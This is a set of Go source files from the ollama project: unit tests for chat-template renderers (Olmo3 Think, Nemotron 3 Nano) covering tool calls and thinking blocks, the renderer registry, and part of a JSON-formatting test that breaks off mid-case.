"<|im_start|>assistant\n" + "<think>", }, { name: "7b_multi_turn_conversation", variant: Olmo31Think, msgs: []api.Message{ {Role: "user", Content: "Hello"}, {Role: "assistant", Content: "Hi there!"}, {Role: "user", Content: "How are you?"}, }, expected: "<|im_start|>system\n" + "You are Olmo, a helpful AI assistant built by Ai2. Your date cutoff is December 2024, and your model weights are available at https://huggingface.co/allenai.<|im_end|>\n" + "<|im_start|>user\n" + "Hello<|im_end|>\n" + "<|im_start|>assistant\n" + "Hi there!<|im_end|>\n" + "<|im_start|>user\n" + "How are you?<|im_end|>\n" + "<|im_start|>assistant\n" + "<think>", }, { name: "32b_basic_without_system", variant: Olmo3Think32B, msgs: []api.Message{ {Role: "user", Content: "Hello!"}, }, expected: "<|im_start|>system\n" + "You are a helpful AI assistant.<|im_end|>\n" + "<|im_start|>user\n" + "Hello!<|im_end|>\n" + "<|im_start|>assistant\n" + "<think>", }, { name: "32b_with_custom_system_gets_suffix", variant: Olmo3Think32B, msgs: []api.Message{ {Role: "system", Content: "You are a helpful assistant."}, {Role: "user", Content: "Hello!"}, }, expected: "<|im_start|>system\n" + "You are a helpful assistant. You do not currently have access to any functions. <functions></functions><|im_end|>\n" + "<|im_start|>user\n" + "Hello!<|im_end|>\n" + "<|im_start|>assistant\n" + "<think>", }, { name: "31_basic_without_system", variant: Olmo31Think, msgs: []api.Message{ {Role: "user", Content: "Hello!"}, }, expected: "<|im_start|>system\n" + "You are Olmo, a helpful AI assistant built by Ai2. Your date cutoff is December 2024, and your model weights are available at https://huggingface.co/allenai.<|im_end|>\n" + "<|im_start|>user\n" + "Hello!<|im_end|>\n" + "<|im_start|>assistant\n" + "<think>", }, { name: "31_with_custom_system_gets_suffix", variant: Olmo31Think, msgs: []api.Message{ {Role: "system", Content: "You are a helpful assistant."}, {Role: "user", Content: "Hello!"}, }, expected: "<|im_start|>system\n" + "You are a helpful assistant. You do not currently have access to any functions. <functions></functions><|im_end|>\n" + "<|im_start|>user\n" + "Hello!<|im_end|>\n" + "<|im_start|>assistant\n" + "<think>", }, } for _, tt := range tests { t.Run(tt.name, func(t *testing.T) { rendered, err := (&Olmo3ThinkRenderer{Variant: tt.variant}).Render(tt.msgs, tt.tools, nil) if err != nil { t.Fatal(err) } if diff := cmp.Diff(rendered, tt.expected); diff != "" { t.Errorf("mismatch (-got +want):\n%s", diff) } }) } }
go
MIT
626af2d80973270c4d59b8df7153ac47ad67ed7b
2026-01-07T08:35:43.337630Z
false
ollama/ollama
https://github.com/ollama/ollama/blob/626af2d80973270c4d59b8df7153ac47ad67ed7b/model/renderers/nemotron3nano_test.go
model/renderers/nemotron3nano_test.go
package renderers import ( "testing" "github.com/google/go-cmp/cmp" "github.com/ollama/ollama/api" ) func TestNemotron3NanoRenderer(t *testing.T) { tests := []struct { name string msgs []api.Message tools []api.Tool thinkValue *api.ThinkValue expected string }{ { name: "basic user message - thinking mode", msgs: []api.Message{ {Role: "user", Content: "Hello!"}, }, thinkValue: &api.ThinkValue{Value: true}, expected: "<|im_start|>system\n<|im_end|>\n" + "<|im_start|>user\nHello!<|im_end|>\n" + "<|im_start|>assistant\n<think>\n", }, { name: "basic user message - no thinking", msgs: []api.Message{ {Role: "user", Content: "Hello!"}, }, thinkValue: nil, expected: "<|im_start|>system\n<|im_end|>\n" + "<|im_start|>user\nHello!<|im_end|>\n" + "<|im_start|>assistant\n<think></think>", }, { name: "with system message", msgs: []api.Message{ {Role: "system", Content: "You are a helpful assistant."}, {Role: "user", Content: "Hello!"}, }, thinkValue: &api.ThinkValue{Value: true}, expected: "<|im_start|>system\nYou are a helpful assistant.<|im_end|>\n" + "<|im_start|>user\nHello!<|im_end|>\n" + "<|im_start|>assistant\n<think>\n", }, { name: "multi-turn conversation", msgs: []api.Message{ {Role: "user", Content: "Hi"}, {Role: "assistant", Content: "Hello! How can I help?"}, {Role: "user", Content: "Tell me a joke"}, }, thinkValue: &api.ThinkValue{Value: true}, expected: "<|im_start|>system\n<|im_end|>\n" + "<|im_start|>user\nHi<|im_end|>\n" + "<|im_start|>assistant\n<think></think>Hello! How can I help?<|im_end|>\n" + "<|im_start|>user\nTell me a joke<|im_end|>\n" + "<|im_start|>assistant\n<think>\n", }, { name: "with tools", msgs: []api.Message{ {Role: "user", Content: "What's the weather in Paris?"}, }, tools: []api.Tool{ { Type: "function", Function: api.ToolFunction{ Name: "get_weather", Description: "Get the current weather", Parameters: api.ToolFunctionParameters{ Type: "object", Required: []string{"city"}, Properties: testPropsMap(map[string]api.ToolProperty{ "city": {Type: api.PropertyType{"string"}, Description: "The city name"}, }), }, }, }, }, thinkValue: &api.ThinkValue{Value: true}, expected: "<|im_start|>system\n" + "# Tools\n\nYou have access to the following functions:\n\n<tools>\n" + "<function>\n<name>get_weather</name>\n" + "<description>Get the current weather</description>\n" + "<parameters>\n" + "<parameter>\n<name>city</name>\n<type>string</type>\n<description>The city name</description>\n</parameter>\n" + "<required>[\"city\"]</required>\n" + "</parameters>\n</function>\n</tools>\n\n" + "If you choose to call a function ONLY reply in the following format with NO suffix:\n\n" + "<tool_call>\n<function=example_function_name>\n<parameter=example_parameter_1>\nvalue_1\n</parameter>\n" + "<parameter=example_parameter_2>\nThis is the value for the second parameter\nthat can span\nmultiple lines\n" + "</parameter>\n</function>\n</tool_call>\n\n<IMPORTANT>\nReminder:\n" + "- Function calls MUST follow the specified format: an inner <function=...></function> block must be nested within <tool_call></tool_call> XML tags\n" + "- Required parameters MUST be specified\n" + "- You may provide optional reasoning for your function call in natural language BEFORE the function call, but NOT after\n" + "- If there is no function call available, answer the question like normal with your current knowledge and do not tell the user about function calls\n" + "</IMPORTANT><|im_end|>\n" + "<|im_start|>user\nWhat's the weather in Paris?<|im_end|>\n" + "<|im_start|>assistant\n<think>\n", }, { name: "tool call with response", msgs: []api.Message{ {Role: "user", Content: "What's the weather in Paris?"}, { Role: "assistant", ToolCalls: []api.ToolCall{ { Function: api.ToolCallFunction{ Name: "get_weather", Arguments: testArgs(map[string]any{"city": "Paris"}), }, }, }, }, {Role: "tool", Content: "Sunny, 72F"}, }, tools: []api.Tool{ { Type: "function", Function: api.ToolFunction{ Name: "get_weather", Description: "Get the current weather", Parameters: api.ToolFunctionParameters{ Type: "object", Required: []string{"city"}, Properties: testPropsMap(map[string]api.ToolProperty{ "city": {Type: api.PropertyType{"string"}, Description: "The city name"}, }), }, }, }, }, thinkValue: &api.ThinkValue{Value: true}, expected: "<|im_start|>system\n" + "# Tools\n\nYou have access to the following functions:\n\n<tools>\n" + "<function>\n<name>get_weather</name>\n" + "<description>Get the current weather</description>\n" + "<parameters>\n" + "<parameter>\n<name>city</name>\n<type>string</type>\n<description>The city name</description>\n</parameter>\n" + "<required>[\"city\"]</required>\n" + "</parameters>\n</function>\n</tools>\n\n" + "If you choose to call a function ONLY reply in the following format with NO suffix:\n\n" + "<tool_call>\n<function=example_function_name>\n<parameter=example_parameter_1>\nvalue_1\n</parameter>\n" + "<parameter=example_parameter_2>\nThis is the value for the second parameter\nthat can span\nmultiple lines\n" + "</parameter>\n</function>\n</tool_call>\n\n<IMPORTANT>\nReminder:\n" + "- Function calls MUST follow the specified format: an inner <function=...></function> block must be nested within <tool_call></tool_call> XML tags\n" + "- Required parameters MUST be specified\n" + "- You may provide optional reasoning for your function call in natural language BEFORE the function call, but NOT after\n" + "- If there is no function call available, answer the question like normal with your current knowledge and do not tell the user about function calls\n" + "</IMPORTANT><|im_end|>\n" + "<|im_start|>user\nWhat's the weather in Paris?<|im_end|>\n" + "<|im_start|>assistant\n<think></think>\n" + "<tool_call>\n<function=get_weather>\n<parameter=city>\nParis\n</parameter>\n</function>\n</tool_call>\n<|im_end|>\n" + "<|im_start|>user\n<tool_response>\nSunny, 72F\n</tool_response>\n<|im_end|>\n" + "<|im_start|>assistant\n<think>\n", }, { name: "assistant with content and tool call", msgs: []api.Message{ {Role: "user", Content: "What's the weather?"}, { Role: "assistant", Content: "Let me check that for you.", ToolCalls: []api.ToolCall{ { Function: api.ToolCallFunction{ Name: "get_weather", Arguments: testArgs(map[string]any{"city": "Paris"}), }, }, }, }, {Role: "tool", Content: "Sunny"}, }, tools: []api.Tool{ { Type: "function", Function: api.ToolFunction{ Name: "get_weather", Parameters: api.ToolFunctionParameters{ Type: "object", Properties: testPropsMap(map[string]api.ToolProperty{ "city": {Type: api.PropertyType{"string"}}, }), }, }, }, }, thinkValue: &api.ThinkValue{Value: true}, expected: "<|im_start|>system\n" + "# Tools\n\nYou have access to the following functions:\n\n<tools>\n" + "<function>\n<name>get_weather</name>\n" + "<parameters>\n" + "<parameter>\n<name>city</name>\n<type>string</type>\n</parameter>\n" + "</parameters>\n</function>\n</tools>\n\n" + "If you choose to call a function ONLY reply in the following format with NO suffix:\n\n" + "<tool_call>\n<function=example_function_name>\n<parameter=example_parameter_1>\nvalue_1\n</parameter>\n" + "<parameter=example_parameter_2>\nThis is the value for the second parameter\nthat can span\nmultiple lines\n" + "</parameter>\n</function>\n</tool_call>\n\n<IMPORTANT>\nReminder:\n" + "- Function calls MUST follow the specified format: an inner <function=...></function> block must be nested within <tool_call></tool_call> XML tags\n" + "- Required parameters MUST be specified\n" + "- You may provide optional reasoning for your function call in natural language BEFORE the function call, but NOT after\n" + "- If there is no function call available, answer the question like normal with your current knowledge and do not tell the user about function calls\n" + "</IMPORTANT><|im_end|>\n" + "<|im_start|>user\nWhat's the weather?<|im_end|>\n" + "<|im_start|>assistant\n<think></think>Let me check that for you.\n" + "<tool_call>\n<function=get_weather>\n<parameter=city>\nParis\n</parameter>\n</function>\n</tool_call>\n<|im_end|>\n" + "<|im_start|>user\n<tool_response>\nSunny\n</tool_response>\n<|im_end|>\n" + "<|im_start|>assistant\n<think>\n", }, { name: "thinking in history is truncated", msgs: []api.Message{ {Role: "user", Content: "Hi"}, {Role: "assistant", Content: "Hello!", Thinking: "Let me think about this..."}, {Role: "user", Content: "How are you?"}, }, thinkValue: &api.ThinkValue{Value: true}, expected: "<|im_start|>system\n<|im_end|>\n" + "<|im_start|>user\nHi<|im_end|>\n" + "<|im_start|>assistant\n<think></think>Hello!<|im_end|>\n" + "<|im_start|>user\nHow are you?<|im_end|>\n" + "<|im_start|>assistant\n<think>\n", }, { name: "parallel tool calls", msgs: []api.Message{ {Role: "user", Content: "Weather in Paris and London?"}, { Role: "assistant", ToolCalls: []api.ToolCall{ { Function: api.ToolCallFunction{ Name: "get_weather", Arguments: testArgs(map[string]any{"city": "Paris"}), }, }, { Function: api.ToolCallFunction{ Name: "get_weather", Arguments: testArgs(map[string]any{"city": "London"}), }, }, }, }, {Role: "tool", Content: "Sunny"}, {Role: "tool", Content: "Rainy"}, }, tools: []api.Tool{ { Type: "function", Function: api.ToolFunction{ Name: "get_weather", Parameters: api.ToolFunctionParameters{ Type: "object", Properties: testPropsMap(map[string]api.ToolProperty{ "city": {Type: api.PropertyType{"string"}}, }), }, }, }, }, thinkValue: &api.ThinkValue{Value: true}, expected: "<|im_start|>system\n" + "# Tools\n\nYou have access to the following functions:\n\n<tools>\n" + "<function>\n<name>get_weather</name>\n" + "<parameters>\n" + "<parameter>\n<name>city</name>\n<type>string</type>\n</parameter>\n" + "</parameters>\n</function>\n</tools>\n\n" + "If you choose to call a function ONLY reply in the following format with NO suffix:\n\n" + "<tool_call>\n<function=example_function_name>\n<parameter=example_parameter_1>\nvalue_1\n</parameter>\n" + "<parameter=example_parameter_2>\nThis is the value for the second parameter\nthat can span\nmultiple lines\n" + "</parameter>\n</function>\n</tool_call>\n\n<IMPORTANT>\nReminder:\n" + "- Function calls MUST follow the specified format: an inner <function=...></function> block must be nested within <tool_call></tool_call> XML tags\n" + "- Required parameters MUST be specified\n" + "- You may provide optional reasoning for your function call in natural language BEFORE the function call, but NOT after\n" + "- If there is no function call available, answer the question like normal with your current knowledge and do not tell the user about function calls\n" + "</IMPORTANT><|im_end|>\n" + "<|im_start|>user\nWeather in Paris and London?<|im_end|>\n" + "<|im_start|>assistant\n<think></think>\n" + "<tool_call>\n<function=get_weather>\n<parameter=city>\nParis\n</parameter>\n</function>\n</tool_call>\n" + "<tool_call>\n<function=get_weather>\n<parameter=city>\nLondon\n</parameter>\n</function>\n</tool_call>\n<|im_end|>\n" + "<|im_start|>user\n<tool_response>\nSunny\n</tool_response>\n<tool_response>\nRainy\n</tool_response>\n<|im_end|>\n" + "<|im_start|>assistant\n<think>\n", }, { name: "thinking disabled when user doesn't request it", msgs: []api.Message{ {Role: "user", Content: "Hello!"}, }, thinkValue: nil, expected: "<|im_start|>system\n<|im_end|>\n" + "<|im_start|>user\nHello!<|im_end|>\n" + "<|im_start|>assistant\n<think></think>", }, { name: "complex message history with thinking, tools, tool calls, tool results and content", msgs: []api.Message{ {Role: "user", Content: "What's the weather in Paris and London? Also, what's 2+2?"}, {Role: "assistant", Content: "", Thinking: "I need to check the weather for both cities and calculate 2+2. Let me start with the weather calls.", ToolCalls: []api.ToolCall{ {Function: api.ToolCallFunction{Name: "get_weather", Arguments: testArgs(map[string]any{"city": "Paris"})}}, {Function: api.ToolCallFunction{Name: "get_weather", Arguments: testArgs(map[string]any{"city": "London"})}}, }}, {Role: "tool", Content: "Sunny, 22°C", ToolCallID: "call1"}, {Role: "tool", Content: "Rainy, 15°C", ToolCallID: "call2"}, {Role: "assistant", Content: "", Thinking: "Now I have the weather data. Let me calculate 2+2.", ToolCalls: []api.ToolCall{ {Function: api.ToolCallFunction{Name: "calculate", Arguments: testArgs(map[string]any{"expression": "2+2"})}}, }}, {Role: "tool", Content: "4", ToolCallID: "call3"}, {Role: "assistant", Content: "Based on the weather data, Paris is sunny at 22°C and London is rainy at 15°C. Also, 2+2 equals 4.", Thinking: "Perfect! I have all the information needed to provide a complete answer."}, }, tools: []api.Tool{ { Type: "function", Function: api.ToolFunction{ Name: "get_weather", Parameters: api.ToolFunctionParameters{ Type: "object", Properties: testPropsMap(map[string]api.ToolProperty{ "city": {Type: api.PropertyType{"string"}}, }), }, }, }, { Type: "function", Function: api.ToolFunction{ Name: "calculate", Parameters: api.ToolFunctionParameters{ Type: "object", Properties: testPropsMap(map[string]api.ToolProperty{ "expression": {Type: api.PropertyType{"string"}}, }), }, }, }, }, thinkValue: &api.ThinkValue{Value: true}, expected: "<|im_start|>system\n" + "# Tools\n\nYou have access to the following functions:\n\n<tools>\n" + "<function>\n<name>get_weather</name>\n" + "<parameters>\n" + "<parameter>\n<name>city</name>\n<type>string</type>\n</parameter>\n" + "</parameters>\n</function>\n" + "<function>\n<name>calculate</name>\n" + "<parameters>\n" + "<parameter>\n<name>expression</name>\n<type>string</type>\n</parameter>\n" + "</parameters>\n</function>\n</tools>\n\n" + "If you choose to call a function ONLY reply in the following format with NO suffix:\n\n" + "<tool_call>\n<function=example_function_name>\n<parameter=example_parameter_1>\nvalue_1\n</parameter>\n" + "<parameter=example_parameter_2>\nThis is the value for the second parameter\nthat can span\nmultiple lines\n" + "</parameter>\n</function>\n</tool_call>\n\n<IMPORTANT>\nReminder:\n" + "- Function calls MUST follow the specified format: an inner <function=...></function> block must be nested within <tool_call></tool_call> XML tags\n" + "- Required parameters MUST be specified\n" + "- You may provide optional reasoning for your function call in natural language BEFORE the function call, but NOT after\n" + "- If there is no function call available, answer the question like normal with your current knowledge and do not tell the user about function calls\n" + "</IMPORTANT><|im_end|>\n" + "<|im_start|>user\nWhat's the weather in Paris and London? Also, what's 2+2?<|im_end|>\n" + "<|im_start|>assistant\n" + "<think>\nI need to check the weather for both cities and calculate 2+2. Let me start with the weather calls.\n</think>\n" + "<tool_call>\n<function=get_weather>\n<parameter=city>\nParis\n</parameter>\n</function>\n</tool_call>\n" + "<tool_call>\n<function=get_weather>\n<parameter=city>\nLondon\n</parameter>\n</function>\n</tool_call>\n<|im_end|>\n" + "<|im_start|>user\n<tool_response>\nSunny, 22°C\n</tool_response>\n<tool_response>\nRainy, 15°C\n</tool_response>\n<|im_end|>\n" + "<|im_start|>assistant\n" + "<think>\nNow I have the weather data. Let me calculate 2+2.\n</think>\n" + "<tool_call>\n<function=calculate>\n<parameter=expression>\n2+2\n</parameter>\n</function>\n</tool_call>\n<|im_end|>\n" + "<|im_start|>user\n<tool_response>\n4\n</tool_response>\n<|im_end|>\n" + "<|im_start|>assistant\n" + "<think>\nPerfect! I have all the information needed to provide a complete answer.\n</think>\n" + "Based on the weather data, Paris is sunny at 22°C and London is rainy at 15°C. Also, 2+2 equals 4.<|im_end|>\n" + "<|im_start|>assistant\n<think>\n", }, { name: "empty messages list", msgs: []api.Message{}, thinkValue: nil, expected: "<|im_start|>system\n<|im_end|>\n<|im_start|>assistant\n<think></think>", }, { name: "tool result with JSON content", msgs: []api.Message{ {Role: "user", Content: "Get user info"}, { Role: "assistant", ToolCalls: []api.ToolCall{ {Function: api.ToolCallFunction{Name: "get_user", Arguments: testArgs(map[string]any{"id": "123"})}}, }, }, {Role: "tool", Content: `{"name": "John", "age": 30, "active": true}`}, }, tools: []api.Tool{ { Type: "function", Function: api.ToolFunction{ Name: "get_user", Parameters: api.ToolFunctionParameters{ Type: "object", Properties: testPropsMap(map[string]api.ToolProperty{"id": {Type: api.PropertyType{"string"}}}), }, }, }, }, thinkValue: &api.ThinkValue{Value: true}, expected: "<|im_start|>system\n" + "# Tools\n\nYou have access to the following functions:\n\n<tools>\n" + "<function>\n<name>get_user</name>\n<parameters>\n" + "<parameter>\n<name>id</name>\n<type>string</type>\n</parameter>\n" + "</parameters>\n</function>\n</tools>\n\n" + "If you choose to call a function ONLY reply in the following format with NO suffix:\n\n" + "<tool_call>\n<function=example_function_name>\n<parameter=example_parameter_1>\nvalue_1\n</parameter>\n" + "<parameter=example_parameter_2>\nThis is the value for the second parameter\nthat can span\nmultiple lines\n" + "</parameter>\n</function>\n</tool_call>\n\n<IMPORTANT>\nReminder:\n" + "- Function calls MUST follow the specified format: an inner <function=...></function> block must be nested within <tool_call></tool_call> XML tags\n" + "- Required parameters MUST be specified\n" + "- You may provide optional reasoning for your function call in natural language BEFORE the function call, but NOT after\n" + "- If there is no function call available, answer the question like normal with your current knowledge and do not tell the user about function calls\n" + "</IMPORTANT><|im_end|>\n" + "<|im_start|>user\nGet user info<|im_end|>\n" + "<|im_start|>assistant\n<think></think>\n" + "<tool_call>\n<function=get_user>\n<parameter=id>\n123\n</parameter>\n</function>\n</tool_call>\n<|im_end|>\n" + "<|im_start|>user\n<tool_response>\n{\"name\": \"John\", \"age\": 30, \"active\": true}\n</tool_response>\n<|im_end|>\n" + "<|im_start|>assistant\n<think>\n", }, { name: "assistant message with only thinking no content", msgs: []api.Message{ {Role: "user", Content: "Think about this"}, {Role: "assistant", Thinking: "Deep thoughts here...", Content: ""}, {Role: "user", Content: "What did you think?"}, }, thinkValue: &api.ThinkValue{Value: true}, expected: "<|im_start|>system\n<|im_end|>\n" + "<|im_start|>user\nThink about this<|im_end|>\n" + "<|im_start|>assistant\n<think></think><|im_end|>\n" + "<|im_start|>user\nWhat did you think?<|im_end|>\n" + "<|im_start|>assistant\n<think>\n", }, { name: "tool call with complex nested argument", msgs: []api.Message{ {Role: "user", Content: "Create data"}, { Role: "assistant", ToolCalls: []api.ToolCall{ {Function: api.ToolCallFunction{ Name: "create", Arguments: testArgs(map[string]any{ "data": map[string]any{"nested": "value", "count": 42}, }), }}, }, }, {Role: "tool", Content: "Created"}, }, tools: []api.Tool{ { Type: "function", Function: api.ToolFunction{ Name: "create", Parameters: api.ToolFunctionParameters{ Type: "object", Properties: testPropsMap(map[string]api.ToolProperty{"data": {Type: api.PropertyType{"object"}}}), }, }, }, }, thinkValue: &api.ThinkValue{Value: true}, expected: "<|im_start|>system\n" + "# Tools\n\nYou have access to the following functions:\n\n<tools>\n" + "<function>\n<name>create</name>\n<parameters>\n" + "<parameter>\n<name>data</name>\n<type>object</type>\n</parameter>\n" + "</parameters>\n</function>\n</tools>\n\n" + "If you choose to call a function ONLY reply in the following format with NO suffix:\n\n" + "<tool_call>\n<function=example_function_name>\n<parameter=example_parameter_1>\nvalue_1\n</parameter>\n" + "<parameter=example_parameter_2>\nThis is the value for the second parameter\nthat can span\nmultiple lines\n" + "</parameter>\n</function>\n</tool_call>\n\n<IMPORTANT>\nReminder:\n" + "- Function calls MUST follow the specified format: an inner <function=...></function> block must be nested within <tool_call></tool_call> XML tags\n" + "- Required parameters MUST be specified\n" + "- You may provide optional reasoning for your function call in natural language BEFORE the function call, but NOT after\n" + "- If there is no function call available, answer the question like normal with your current knowledge and do not tell the user about function calls\n" + "</IMPORTANT><|im_end|>\n" + "<|im_start|>user\nCreate data<|im_end|>\n" + "<|im_start|>assistant\n<think></think>\n" + "<tool_call>\n<function=create>\n<parameter=data>\n{\"count\":42,\"nested\":\"value\"}\n</parameter>\n</function>\n</tool_call>\n<|im_end|>\n" + "<|im_start|>user\n<tool_response>\nCreated\n</tool_response>\n<|im_end|>\n" + "<|im_start|>assistant\n<think>\n", }, { name: "content explaining the format itself", msgs: []api.Message{ {Role: "user", Content: "How do I format a tool call?"}, {Role: "assistant", Content: "To call a tool, use <tool_call> tags with <function=name> inside."}, {Role: "user", Content: "Thanks!"}, }, thinkValue: &api.ThinkValue{Value: true}, expected: "<|im_start|>system\n<|im_end|>\n" + "<|im_start|>user\nHow do I format a tool call?<|im_end|>\n" + "<|im_start|>assistant\n<think></think>To call a tool, use <tool_call> tags with <function=name> inside.<|im_end|>\n" + "<|im_start|>user\nThanks!<|im_end|>\n" + "<|im_start|>assistant\n<think>\n", }, { name: "unicode in content and tool args", msgs: []api.Message{ {Role: "user", Content: "Translate 你好"}, { Role: "assistant", ToolCalls: []api.ToolCall{ {Function: api.ToolCallFunction{Name: "translate", Arguments: testArgs(map[string]any{"text": "你好"})}}, }, }, {Role: "tool", Content: "Hello"}, }, tools: []api.Tool{ { Type: "function", Function: api.ToolFunction{ Name: "translate", Parameters: api.ToolFunctionParameters{ Type: "object", Properties: testPropsMap(map[string]api.ToolProperty{ "text": {Type: api.PropertyType{"string"}}, }), }, }, }, }, thinkValue: &api.ThinkValue{Value: true}, expected: "<|im_start|>system\n" + "# Tools\n\nYou have access to the following functions:\n\n<tools>\n" + "<function>\n<name>translate</name>\n<parameters>\n" + "<parameter>\n<name>text</name>\n<type>string</type>\n</parameter>\n" + "</parameters>\n</function>\n</tools>\n\n" + "If you choose to call a function ONLY reply in the following format with NO suffix:\n\n" + "<tool_call>\n<function=example_function_name>\n<parameter=example_parameter_1>\nvalue_1\n</parameter>\n" + "<parameter=example_parameter_2>\nThis is the value for the second parameter\nthat can span\nmultiple lines\n" + "</parameter>\n</function>\n</tool_call>\n\n<IMPORTANT>\nReminder:\n" + "- Function calls MUST follow the specified format: an inner <function=...></function> block must be nested within <tool_call></tool_call> XML tags\n" + "- Required parameters MUST be specified\n" + "- You may provide optional reasoning for your function call in natural language BEFORE the function call, but NOT after\n" + "- If there is no function call available, answer the question like normal with your current knowledge and do not tell the user about function calls\n" + "</IMPORTANT><|im_end|>\n" + "<|im_start|>user\nTranslate 你好<|im_end|>\n" + "<|im_start|>assistant\n<think></think>\n" + "<tool_call>\n<function=translate>\n<parameter=text>\n你好\n</parameter>\n</function>\n</tool_call>\n<|im_end|>\n" + "<|im_start|>user\n<tool_response>\nHello\n</tool_response>\n<|im_end|>\n" + "<|im_start|>assistant\n<think>\n", }, } for _, tt := range tests { t.Run(tt.name, func(t *testing.T) { renderer := &Nemotron3NanoRenderer{} rendered, err := renderer.Render(tt.msgs, tt.tools, tt.thinkValue) if err != nil { t.Fatal(err) } if diff := cmp.Diff(rendered, tt.expected); diff != "" { t.Errorf("mismatch (-got +want):\n%s", diff) } }) } }
go
MIT
626af2d80973270c4d59b8df7153ac47ad67ed7b
2026-01-07T08:35:43.337630Z
false
ollama/ollama
https://github.com/ollama/ollama/blob/626af2d80973270c4d59b8df7153ac47ad67ed7b/model/renderers/renderer.go
model/renderers/renderer.go
package renderers import ( "fmt" "github.com/ollama/ollama/api" ) type Renderer interface { Render(messages []api.Message, tools []api.Tool, think *api.ThinkValue) (string, error) } type ( RendererConstructor func() Renderer RendererRegistry struct { renderers map[string]RendererConstructor } ) // RenderImgTags is a global flag that tells renderers to use [img] tags // for images. This is set by the Ollama server package on init, or left as // false for other environments where renderers are used var RenderImgTags bool func (r *RendererRegistry) Register(name string, renderer RendererConstructor) { r.renderers[name] = renderer } var registry = RendererRegistry{ renderers: make(map[string]RendererConstructor), } func Register(name string, renderer RendererConstructor) { registry.Register(name, renderer) } func RenderWithRenderer(name string, msgs []api.Message, tools []api.Tool, think *api.ThinkValue) (string, error) { renderer := rendererForName(name) if renderer == nil { return "", fmt.Errorf("unknown renderer %q", name) } return renderer.Render(msgs, tools, think) } func rendererForName(name string) Renderer { if constructor, ok := registry.renderers[name]; ok { return constructor() } switch name { case "qwen3-coder": renderer := &Qwen3CoderRenderer{} return renderer case "qwen3-vl-instruct": renderer := &Qwen3VLRenderer{isThinking: false, useImgTags: RenderImgTags} return renderer case "qwen3-vl-thinking": renderer := &Qwen3VLRenderer{isThinking: true, useImgTags: RenderImgTags} return renderer case "cogito": renderer := &CogitoRenderer{isThinking: true} return renderer case "deepseek3.1": renderer := &DeepSeek3Renderer{IsThinking: true, Variant: Deepseek31} return renderer case "olmo3": renderer := &Olmo3Renderer{UseExtendedSystemMessage: false} return renderer case "olmo3.1": renderer := &Olmo3Renderer{UseExtendedSystemMessage: true} return renderer case "olmo3-think": // Used for Olmo-3-7B-Think and Olmo-3.1-32B-Think (same template) renderer := &Olmo3ThinkRenderer{Variant: Olmo31Think} return renderer case "olmo3-32b-think": // Used for Olmo-3-32B-Think renderer := &Olmo3ThinkRenderer{Variant: Olmo3Think32B} return renderer case "nemotron-3-nano": return &Nemotron3NanoRenderer{} case "functiongemma": return &FunctionGemmaRenderer{} default: return nil } }
go
MIT
626af2d80973270c4d59b8df7153ac47ad67ed7b
2026-01-07T08:35:43.337630Z
false
ollama/ollama
https://github.com/ollama/ollama/blob/626af2d80973270c4d59b8df7153ac47ad67ed7b/model/renderers/json_test.go
model/renderers/json_test.go
package renderers import ( "testing" "github.com/google/go-cmp/cmp" ) func TestMarshalWithSpaces(t *testing.T) { tests := []struct { name string input any expected string }{ // basic formatting tests { name: "simple object", input: map[string]any{"key": "value"}, expected: `{"key": "value"}`, }, { name: "simple array", input: []any{"a", "b", "c"}, expected: `["a", "b", "c"]`, }, // escaped quotes { name: "escaped quote in string", input: map[string]any{"text": `quote"inside`}, expected: `{"text": "quote\"inside"}`, }, { name: "multiple escaped quotes", input: map[string]any{"text": `say "hello" and "goodbye"`}, expected: `{"text": "say \"hello\" and \"goodbye\""}`, }, // escaped backslashes { name: "escaped backslash", input: map[string]any{"path": `C:\windows\system32`}, expected: `{"path": "C:\\windows\\system32"}`, }, { name: "double backslash", input: map[string]any{"text": `test\\more`}, expected: `{"text": "test\\\\more"}`, }, { name: "backslash before quote", input: map[string]any{"text": `end with \"`}, expected: `{"text": "end with \\\""}`, }, // standard JSON escape sequences { name: "newline in string", input: map[string]any{"text": "line1\nline2"}, expected: `{"text": "line1\nline2"}`, }, { name: "tab in string", input: map[string]any{"text": "before\tafter"}, expected: `{"text": "before\tafter"}`, }, { name: "carriage return", input: map[string]any{"text": "before\rafter"}, expected: `{"text": "before\rafter"}`, }, { name: "multiple escape sequences", input: map[string]any{"text": "line1\nline2\ttab\rcarriage"}, expected: `{"text": "line1\nline2\ttab\rcarriage"}`, }, // strings containing colons and commas (no spaces should be added inside) { name: "colon in string", input: map[string]any{"url": "http://example.com"}, expected: `{"url": "http://example.com"}`, }, { name: "comma in string", input: map[string]any{"list": "apple, banana, cherry"}, expected: `{"list": "apple, banana, cherry"}`, }, { name: "colon and comma in string", input: map[string]any{"data": "key:value, key2:value2"}, expected: `{"data": "key:value, key2:value2"}`, }, // unicode characters { name: "emoji", input: map[string]any{"emoji": "😀🎉✨"}, expected: `{"emoji": "😀🎉✨"}`, }, { name: "chinese characters", input: map[string]any{"text": "你好世界"}, expected: `{"text": "你好世界"}`, }, { name: "arabic characters", input: map[string]any{"text": "مرحبا"}, expected: `{"text": "مرحبا"}`, }, { name: "mixed unicode and ascii", input: map[string]any{"text": "Hello 世界! 😀"}, expected: `{"text": "Hello 世界! 😀"}`, }, { name: "unicode with special symbols", input: map[string]any{"text": "®©™€£¥"}, expected: `{"text": "®©™€£¥"}`, }, // complex combinations - strings that look like JSON { name: "json string inside value", input: map[string]any{"nested": `{"key":"value"}`}, expected: `{"nested": "{\"key\":\"value\"}"}`, }, { name: "json array inside value", input: map[string]any{"array": `["a","b","c"]`}, expected: `{"array": "[\"a\",\"b\",\"c\"]"}`, }, // edge cases { name: "empty string", input: map[string]any{"empty": ""}, expected: `{"empty": ""}`, }, { name: "empty object", input: map[string]any{}, expected: `{}`, }, { name: "empty array", input: []any{}, expected: `[]`, }, { name: "numbers", input: map[string]any{"int": 42, "float": 3.14}, expected: `{"float": 3.14, "int": 42}`, }, { name: "boolean", input: map[string]any{"bool": true, "other": false}, expected: `{"bool": true, "other": false}`, }, { name: "null value", input: map[string]any{"value": nil}, expected: `{"value": null}`, }, // nested structures with complex strings { name: "nested object with escapes", input: map[string]any{ "outer": map[string]any{ "path": `C:\folder\file.txt`, "quote": `He said "hi"`, }, }, expected: `{"outer": {"path": "C:\\folder\\file.txt", "quote": "He said \"hi\""}}`, }, { name: "array with unicode and escapes", input: []any{ "normal", "with\nnewline", "with\"quote", "emoji😀", "colon:comma,", }, expected: `["normal", "with\nnewline", "with\"quote", "emoji😀", "colon:comma,"]`, }, { name: "backslash at positions before special chars", input: map[string]any{"text": `a\b:c\d,e`}, expected: `{"text": "a\\b:c\\d,e"}`, }, { name: "multiple backslashes before quote", input: map[string]any{"text": 